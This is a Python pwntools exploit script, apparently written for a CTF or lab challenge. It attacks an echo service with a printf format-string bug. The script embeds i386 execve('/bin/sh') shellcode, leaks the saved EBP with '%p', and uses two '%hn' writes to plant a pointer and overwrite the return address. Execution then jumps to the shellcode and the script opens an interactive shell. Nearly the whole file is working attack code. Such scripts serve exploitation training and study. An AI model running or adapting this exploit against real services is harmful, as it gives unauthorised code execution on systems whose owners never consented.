  1. from pwn import *
  2. import time
  3.  
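# i386 execve("/bin//sh", NULL, NULL) shellcode, 21 bytes:
#   xor ecx,ecx ; mul ecx ; push ecx ; push "//sh" ; push "/bin"
#   mov ebx,esp ; mov al,0xb ; int 0x80
# It contains no '%', no NUL and no newline, so printf echoes it verbatim
# and it survives a line-based C-string read.  Kept as a str because this
# script targets the Python 2 pwntools API (raw_input, str payloads); on
# Python 3 it would have to be sent as bytes (latin-1), not UTF-8.
SHELLCODE = ("\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             "\x89\xe3\xb0\x0b\xcd\x80")


def _parse_leaked_pointer(line):
    """Convert the echoed ``%<n>$p`` output (``0x...`` plus newline) to an int.

    Raises:
        ValueError: the echo is ``(nil)`` or otherwise not a ``0x``-prefixed
            pointer -- a clearer failure than the bare ``int()`` error, and
            usually a sign that ``leak_index`` names the wrong stack slot.
    """
    text = line.strip()
    if not text.lower().startswith("0x"):
        raise ValueError("expected a %%p-style pointer leak, got %r" % (text,))
    return int(text, 16)


def _hn_payload(value, arg_index, prefix=""):
    """Build a format string that writes ``value & 0xffff`` via ``%<n>$hn``.

    ``%hn`` stores the number of characters printed so far as a 16-bit
    short at the address held in positional argument ``arg_index``.  The
    payload is ``prefix`` followed by ``%<pad>x`` whose field width pads
    the output up to exactly ``value & 0xffff`` characters, then the
    ``%hn`` itself.

    Args:
        value: quantity to write; only its low half-word is used, so the
            high half-word at the target must already hold the right value.
        arg_index: 1-based printf argument index holding the target pointer.
        prefix: data echoed verbatim before the padding (e.g. shellcode
            that must land in the buffer); it counts toward the total.

    Returns:
        The payload str, without a trailing newline.

    Raises:
        ValueError: ``prefix`` contains ``%`` or NUL (printf would interpret
            or truncate it), or is longer than the target count.
    """
    if "%" in prefix or "\x00" in prefix:
        raise ValueError("prefix must not contain '%' or NUL")
    target = value & 0xffff
    pad = target - len(prefix)
    if pad < 0:
        raise ValueError("prefix is %d bytes, longer than target count 0x%04x"
                         % (len(prefix), target))
    if pad == 0:
        # Count already correct; a literal "%0x" would still print >= 1 char.
        return prefix + "%" + str(arg_index) + "$hn"
    # NOTE: the width is a minimum.  If pad were smaller than the hex
    # rendering of the argument %x consumes, the count would overshoot; the
    # targets used here give pad ~40k, so that does not bite in practice.
    return prefix + "%" + str(pad) + "x%" + str(arg_index) + "$hn"


def hackIt(host="127.0.0.1", port=8888, buf_addr=0x0804A080,
           leak_index=4, ptr_index=12, wait_for_debugger=True):
    """Exploit an echo service with a format-string bug in three round trips.

    Every line sent is used by the service as a printf format.  Stages:

    1. ``%<leak_index>$p`` leaks the saved EBP of the echo frame.  The
       word 4 bytes past it is taken to be the return-address slot (the
       original called it ``ret_main``).
    2. ``%<leak_index>$hn`` writes the low half-word of that slot's address
       through the saved-EBP pointer, so the word it points at now points
       at the return-address slot.
    3. ``%<ptr_index>$hn`` writes the low half-word of ``buf_addr`` through
       that freshly planted pointer, redirecting the return into the
       shellcode which the same payload has just echoed into the buffer.

    Stages 2 and 3 are 2-byte writes, so the script assumes the high
    half-words of both targets already match the intended values.

    Args:
        host, port: target service (previously hard-coded 127.0.0.1:8888).
        buf_addr: address where the echoed shellcode lands (previously the
            hard-coded 0x0804A080).
        leak_index: printf argument index of the saved EBP.
        ptr_index: printf argument index of the word the saved EBP points at.
        wait_for_debugger: pause after connecting so gdb can be attached.

    Raises:
        ValueError: the leak is not a pointer (see _parse_leaked_pointer).
    """
    r = remote(host, port)
    if wait_for_debugger:
        raw_input("debug?")

    # Stage 1: leak the saved EBP.
    r.sendline("%" + str(leak_index) + "$p")
    saved_ebp = _parse_leaked_pointer(r.recvuntil("\n"))
    ret_slot = saved_ebp + 4  # assumed return-address slot; verify in gdb

    # Stage 2: plant a pointer to the return-address slot.
    r.sendline(_hn_payload(ret_slot, leak_index))

    # Stage 3: overwrite the return address with buf_addr while dropping
    # the shellcode into that buffer with the same write.
    r.sendline(_hn_payload(buf_addr, ptr_index, prefix=SHELLCODE))

    r.interactive()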
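if __name__ == "__main__":
    # Fire the exploit only when run as a script, not when imported.
    hackIt()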